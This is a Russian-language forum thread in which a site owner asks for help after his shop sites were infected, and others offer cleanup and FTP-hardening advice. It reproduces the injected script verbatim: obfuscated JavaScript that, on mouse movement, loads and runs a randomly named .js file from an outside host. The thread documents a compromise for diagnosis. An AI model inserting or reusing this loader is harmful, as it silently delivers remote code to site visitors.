Уже второй раз два сайта атакованы вирусами

[mazdov 0]

Уже второй раз два сайта атакованы вирусами.

www.9829192.ru

www.arenaspb.ru

Первый раз грузил бекапы, после чего долго восстанавливал скрипты (Если помните Александр, тини редактор не работал)

Где дыра?

И есть ли более эффективный способ восстановления?

[mazdov 0]

Причем если предположить теорию, что угнали код от фтп, то почему тогда другие сайты, которые у меня в этом же фтп на движке дле работают корректно, хотя я точно знаю, что дле тоже подвергается атакой этого вирус скрипта.

Причем сайты находятся на разных хостингах

проверял компьютер разными антивирусами, пусто

вот эту строчку вставляет в код магазина

<script type="text/javascript">

var _0x5cb4=["\x68\x74\x74\x70\x3A\x2F\x2F\x6C\x69\x6E\x75\x78\x73\x74\x61\x62\x73\x2E\x63\x6F\x6D\x2F","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x72\x61\x6E\x64\x6F\x6D","\x2E\x6A\x73","\x6F\x6E\x6D\x6F\x75\x73\x65\x6D\x6F\x76\x65","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x63\x6F\x6D\x70\x6C\x65\x74\x65","\x6F\x6E\x6C\x6F\x61\x64","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];(function (){var _0x8dacx1=_0x5cb4[0]+Math[_0x5cb4[2]]().toString()[_0x5cb4[1]](3)+_0x5cb4[3];var _0x8dacx2=0;document[_0x5cb4[4]]=function (){if(_0x8dacx2===0){_0x8dacx2=1;var _0x8dacx3=document[_0x5cb4[6]](_0x5cb4[5])[0];var _0x8dacx4=document[_0x5cb4[8]](_0x5cb4[7]);_0x8dacx4[_0x5cb4[9]]=_0x5cb4[10];_0x8dacx4[_0x5cb4[11]]=function (){if(this[_0x5cb4[12]]==_0x5cb4[13]){_0x8dacx2=2;} ;} ;_0x8dacx4[_0x5cb4[14]]=function (){_0x8dacx2=2;} ;_0x8dacx4[_0x5cb4[15]]=_0x8dacx1;_0x8dacx3[_0x5cb4[16]](_0x8dacx4);} ;} ;} )();

</script>[/code]


Как я понял, этот код во всех index и header файлах и в php и html, htm и в main.php, default.php


Есть ли какая нибудь возможность удалить разом все эти скрипты, без загрузки бекапаа?

[mazdov 0]

На www.9829192.ru я удалил все в ручную, потратив кучу времени, если такая проблема бывает часто. Александр, я думаю нужно иметь быстрое решение, какую нибудь программу которая могла бы искать код на сервере фтп и удалять его. Нужно иметь быстрое решение.

[ssacom 0]

Такая же хрень была код точь в точь )) Правда на других движках.

Такие вещи обычно через FTP пролезают.

PS Убрать левый код - Найти и заменить во всех файлах программой типа @Text Replacer

PS Закройте доступ FTP совсем ... или открыть только для ваших IP адресов.

[mazdov 0]

Text Replacer эта программа на фтп залезет? или скачать надо сначала на комп?

[ssacom 0]

к сожалению она только с компа работает.. реплеисеры для ftp ни разу не видел

ставиЖ программу.... скачиваеЖ все файлы.... реплейсером удаляеЖ из всех ваилов код... и заливаеЖ обратно... и закрываеЖ ftp по IP адресам

[support 447]

В текущей версии магазина дырок вроде бы нет, во всяком случае я не знаю.

Возможно, что это вирус на Вашем компе.

[support 447]

Либо версия магазина старая и не обновляли её.

[Laroux 0]

А еще легко внедряют вирусню через папки бирж ссылок. Например, sape(dot)ru (т.к. служебные каталоги таких папок на хостинге открыты для всего). У меня было такое (правда не на магазине, но тем не менее).

[shaklov 63]

Поцоны! Не ходите туда! У меня брат от это го до сих пор в реанимации!

[Laroux 0]

[:|||||||:], это о чем пост был?

[YuraS 4]

' timestamp='1307041108' post='68752']

Поцоны! Не ходите туда! У меня брат от это го до сих пор в реанимации!

близко к сердцу воспринял, что ли, пертубации в Сапе?

я там уже 4 года. нормально все.

кому интересно - дам рефссылку

консультации только тем, кто по рефссылке зарегится ;)